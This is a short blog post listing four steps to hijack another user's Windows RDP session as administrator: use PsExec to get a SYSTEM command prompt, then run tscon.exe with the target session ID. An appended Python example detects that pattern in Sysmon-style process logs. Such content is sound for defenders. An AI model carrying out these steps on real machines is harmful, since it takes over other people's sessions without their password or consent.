Wednesday, June 13, 2018

RDP session hijacking (without password / as administrator)

  1. Get the session ID of the session you want to connect to
  2. Get PsExec
  3. From an admin CMD, start a CMD running under the SYSTEM account: psexec -i -s -d cmd
  4. In that SYSTEM CMD, run tscon.exe <sessionID>
Sources:
  1. PsExec
  2. Getting a CMD prompt as SYSTEM in Windows Vista and Windows Server 2008
  3. RDP hijacking — how to hijack RDS...
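
A defender-side view of the steps above, as an added example that is not part of the original post: the procedure leaves a process-creation trail (PsExec's service, a SYSTEM cmd, then tscon.exe with a session ID) that can be matched in process-creation logs. The records are constructed and shaped like Sysmon Event ID 1; the function name and alert fields are assumptions of this example.

```python
import re

# Constructed sample records shaped like Sysmon Event ID 1 (process creation).
# Field names follow Sysmon; every value is made up for this example.
EVENTS = [
    {"ProcessId": 4100, "ParentProcessId": 700, "User": r"NT AUTHORITY\SYSTEM",
     "Image": r"C:\Windows\PSEXESVC.exe", "CommandLine": r"C:\Windows\PSEXESVC.exe"},
    {"ProcessId": 4200, "ParentProcessId": 4100, "User": r"NT AUTHORITY\SYSTEM",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd"},
    {"ProcessId": 4300, "ParentProcessId": 4200, "User": r"NT AUTHORITY\SYSTEM",
     "Image": r"C:\Windows\System32\tscon.exe", "CommandLine": "tscon.exe 2"},
    {"ProcessId": 5100, "ParentProcessId": 900, "User": r"CORP\alice",
     "Image": r"C:\Windows\System32\tscon.exe", "CommandLine": "tscon.exe 3 /dest:console"},
]

SYSTEM = r"NT AUTHORITY\SYSTEM"
SESSION_ARG = re.compile(r'tscon(?:\.exe)?"?\s+(\d+)', re.IGNORECASE)


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def find_tscon_as_system(events):
    """Hypothetical detector: tscon.exe started as SYSTEM with a session ID."""
    # PIDs are reused on real hosts; key on ProcessGuid when reading real Sysmon data.
    by_pid = {e["ProcessId"]: e for e in events}
    alerts = []
    for e in events:
        m = SESSION_ARG.search(e["CommandLine"])
        if basename(e["Image"]) != "tscon.exe" or e["User"].upper() != SYSTEM or not m:
            continue
        # Walk up the parent chain to see whether PsExec's service is an ancestor.
        chain, cur = [], e
        while cur and len(chain) < 8:
            chain.append(basename(cur["Image"]))
            cur = by_pid.get(cur["ParentProcessId"])
        alerts.append({"pid": e["ProcessId"], "target_session": int(m.group(1)),
                       "via_psexec": "psexesvc.exe" in chain, "chain": chain[::-1]})
    return alerts


if __name__ == "__main__":
    for alert in find_tscon_as_system(EVENTS):
        print(alert)
```

A SYSTEM-context tscon.exe with no PsExec ancestor still produces an alert, with via_psexec set to False, because PsExec is only one way to obtain a SYSTEM prompt.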
